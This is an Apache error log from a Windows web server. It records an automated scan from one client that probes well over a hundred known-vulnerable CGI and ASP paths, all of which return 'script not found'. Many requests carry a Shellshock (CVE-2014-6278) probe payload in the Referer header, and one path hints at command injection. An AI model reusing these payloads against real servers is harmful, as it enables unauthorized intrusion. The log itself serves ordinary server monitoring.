[Wed Sep 29 21:30:23.658180 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/test_cgi.php, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:23.782981 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/test.cgi.php, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:23.892181 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/test_cgi.pl, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:24.001381 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/test-cgi.pl, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:24.126181 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/test.py, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:24.250981 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/test.sh, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:24.360182 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/tmUnblock.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:24.469382 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/uname.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:24.578582 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/viewcvs.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:24.734582 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/welcome, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:24.874983 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/whois.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:24.999783 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] attempt to invoke directory as script: E:/nuevo/cgi-bin/, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:25.233783 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/admin.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:25.342983 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/administrator.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:25.467784 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/authLogin.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:25.764184 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/banner.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:25.873384 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/book.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:25.982584 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/cgiinfo.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:26.372585 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/contact.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:26.481785 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/count.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:26.606586 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/defaultwebpage.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:26.715786 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/download.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:26.824986 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/entropysearch.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:26.934186 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/env.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:27.043386 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/environment.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:27.261787 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/formmail.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:27.370987 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/FormMail-clone.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:27.480187 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/guestbook.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:27.620587 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/helpdesk.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:27.729788 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/index.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:27.948188 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/index.pl, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:28.057388 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/info.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:28.275789 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/loadpage.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:28.400589 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/login.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:28.618989 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/login.pl, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:28.728189 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/pathtest.pl, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:29.289790 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/php.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:29.617391 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/restore_config.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:29.960591 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/search.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:30.319392 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/sysinfo.pl, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:30.646993 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/test.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:30.990193 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/test_cgi.pl, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:31.114994 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/test-cgi.pl, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:31.458194 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/tmUnblock.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:31.567394 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/uname.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:31.676594 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/viewcvs.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:31.894995 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/htdocs/whois.cgi, referer: () { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; }
[Wed Sep 29 21:30:32.347396 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/cart32.exe
[Wed Sep 29 21:30:32.456596 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/classified.cgi
[Wed Sep 29 21:30:32.565796 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/download.cgi
[Wed Sep 29 21:30:32.674996 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/flexform.cgi
[Wed Sep 29 21:30:32.784196 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/flexform
[Wed Sep 29 21:30:32.908997 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/lwgate.cgi
[Wed Sep 29 21:30:33.018197 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/LWGate.cgi
[Wed Sep 29 21:30:33.127397 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/lwgate
[Wed Sep 29 21:30:33.252197 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/LWGate
[Wed Sep 29 21:30:33.361397 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/perlshop.cgi
[Wed Sep 29 21:30:34.827800 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/handler.cgi
[Wed Sep 29 21:30:34.937000 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/finger
[Wed Sep 29 21:30:35.046200 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/finger.pl
[Wed Sep 29 21:30:35.155401 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/formmail.cgi
[Wed Sep 29 21:30:35.264601 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/formmail
[Wed Sep 29 21:30:35.373801 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/get32.exe
[Wed Sep 29 21:30:35.498601 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/gm-authors.cgi
[Wed Sep 29 21:30:35.623401 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/guestbook
[Wed Sep 29 21:30:35.732602 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/horde
[Wed Sep 29 21:30:35.841802 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/photo
[Wed Sep 29 21:30:35.951002 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/wrap.cgi
[Wed Sep 29 21:30:36.294203 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/wrap
[Wed Sep 29 21:30:38.462606 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/formmail.pl
[Wed Sep 29 21:30:38.634207 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/horde
[Wed Sep 29 21:30:39.227008 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/visadmin.exe
[Wed Sep 29 21:30:39.336208 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/html2chtml.cgi
[Wed Sep 29 21:30:39.523408 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/html2wml.cgi
[Wed Sep 29 21:30:39.632608 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/pollit
[Wed Sep 29 21:30:39.819809 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/echo.bat
[Wed Sep 29 21:30:39.929009 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34964] script not found or unable to stat: E:/nuevo/cgi-bin/excite;IFS=
[Wed Sep 29 21:30:40.225410 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/ezshopper
[Wed Sep 29 21:30:40.428210 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/guestbook.cgi
[Wed Sep 29 21:30:40.537410 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/guestbook.pl
[Wed Sep 29 21:30:40.677810 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/ss
[Wed Sep 29 21:30:41.661612 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/gH.cgi
[Wed Sep 29 21:30:41.770812 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/gm-cplog.cgi
[Wed Sep 29 21:30:42.098413 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/gm.cgi
[Wed Sep 29 21:30:42.332413 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/AT-admin.cgi
[Wed Sep 29 21:30:42.441613 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/auth_data
[Wed Sep 29 21:30:42.550814 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/awstats.pl
[Wed Sep 29 21:30:42.660014 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/awstats
[Wed Sep 29 21:30:42.784814 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/blog
[Wed Sep 29 21:30:42.894014 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/cart.pl
[Wed Sep 29 21:30:43.003214 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/cart.pl
[Wed Sep 29 21:30:43.112415 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/htsearch
[Wed Sep 29 21:30:43.237215 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/mt-static
[Wed Sep 29 21:30:43.346415 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/mt
[Wed Sep 29 21:30:44.251217 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/banner.cgi
[Wed Sep 29 21:30:44.360417 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/bannereditor.cgi
[Wed Sep 29 21:30:44.469617 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/book.cgi
[Wed Sep 29 21:30:44.688017 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/architext_query.pl
[Wed Sep 29 21:30:44.797218 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/bizdb1-search.cgi
[Wed Sep 29 21:30:44.922018 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/blog
[Wed Sep 29 21:30:45.140418 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/blog
[Wed Sep 29 21:30:45.265218 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/atk
[Wed Sep 29 21:30:45.374419 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/atk
[Wed Sep 29 21:30:47.418022 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/htdocs/bigconf.cgi
[Wed Sep 29 21:30:48.666024 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/cgiwrap
[Wed Sep 29 21:30:48.806425 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/cgi-bin/moin.cgi
[Wed Sep 29 21:30:49.633226 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34966] script not found or unable to stat: E:/nuevo/htdocs/cartcart.cgi
[Wed Sep 29 21:30:55.296036 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/astrocam.cgi
[Wed Sep 29 21:30:55.530036 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/badmin.cgi
[Wed Sep 29 21:30:55.717237 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/boozt
[Wed Sep 29 21:30:55.842037 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/ezadmin.cgi
[Wed Sep 29 21:30:55.998037 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/ezboard.cgi
[Wed Sep 29 21:30:56.107237 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/ezman.cgi
[Wed Sep 29 21:30:56.232038 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/foxweb.dll
[Wed Sep 29 21:30:56.341238 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/foxweb.exe
[Wed Sep 29 21:30:56.450438 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/mgrqcgi
[Wed Sep 29 21:30:56.575238 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/wconsole.dll
[Wed Sep 29 21:30:56.715639 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/webplus.exe
[Wed Sep 29 21:30:57.667240 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/uploader.exe
[Wed Sep 29 21:30:58.010441 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/htdocs/upload.asp
[Wed Sep 29 21:30:58.135241 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/htdocs/uploadn.asp
[Wed Sep 29 21:30:58.260041 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/htdocs/uploadx.asp
[Wed Sep 29 21:30:58.728042 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/fpsrvadm.exe
[Wed Sep 29 21:31:01.660847 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/.cobalt
[Wed Sep 29 21:31:02.971250 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/htdocs/shopdbtest.asp
[Wed Sep 29 21:31:03.704451 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/mailit.pl
[Wed Sep 29 21:31:03.813651 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/search
[Wed Sep 29 21:31:04.780853 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/.access
[Wed Sep 29 21:31:05.030453 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/data
[Wed Sep 29 21:31:05.139653 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/empower
[Wed Sep 29 21:31:05.248854 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/mrtg.cgi
[Wed Sep 29 21:31:05.373654 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] script not found or unable to stat: E:/nuevo/cgi-bin/store
[Wed Sep 29 21:31:07.760458 2021] [proxy:error] [pid 10816:tid 21208] (OS 10061)No connection could be made because the target machine actively refused it.  : AH00957: AJP: attempt to connect to 127.0.0.1:8009 (*) failed
[Wed Sep 29 21:31:07.760458 2021] [proxy_ajp:error] [pid 10816:tid 21208] [client 65.94.34.16:34968] AH00896: failed to make connection to backend: 127.0.0.1
[Wed Sep 29 21:31:09.975662 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34970] script not found or unable to stat: E:/nuevo/htdocs/shopa_sessionlist.asp
[Wed Sep 29 21:31:13.922469 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34970] script not found or unable to stat: E:/nuevo/cgi-bin/MsmMask.exe
[Wed Sep 29 21:31:16.231273 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34970] script not found or unable to stat: E:/nuevo/cgi-bin/addbanner.cgi
[Wed Sep 29 21:31:16.356073 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34970] script not found or unable to stat: E:/nuevo/cgi-bin/af.cgi
[Wed Sep 29 21:31:16.465273 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34970] script not found or unable to stat: E:/nuevo/cgi-bin/alienform.cgi
[Wed Sep 29 21:31:16.590073 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34970] script not found or unable to stat: E:/nuevo/cgi-bin/shtml.dll
[Wed Sep 29 21:31:16.808474 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34970] script not found or unable to stat: E:/nuevo/cgi-bin/aglimpse.cgi
[Wed Sep 29 21:31:16.917674 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34970] script not found or unable to stat: E:/nuevo/cgi-bin/aglimpse
[Wed Sep 29 21:31:17.042474 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34970] script not found or unable to stat: E:/nuevo/cgi-bin/architext_query.cgi
[Wed Sep 29 21:31:17.151674 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34970] script not found or unable to stat: E:/nuevo/cgi-bin/cgiemail-1.4
[Wed Sep 29 21:31:22.986085 2021] [mpm_winnt:warn] [pid 10816:tid 21704] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Wed Sep 29 21:31:38.024511 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34974] script not found or unable to stat: E:/nuevo/cgi-bin/cmd1.exe
[Wed Sep 29 21:31:38.149311 2021] [cgi:error] [pid 10816:tid 21208] [client 65.94.34.16:34974] script not found or unable to stat: E:/nuevo/cgi-bin/hello.bat
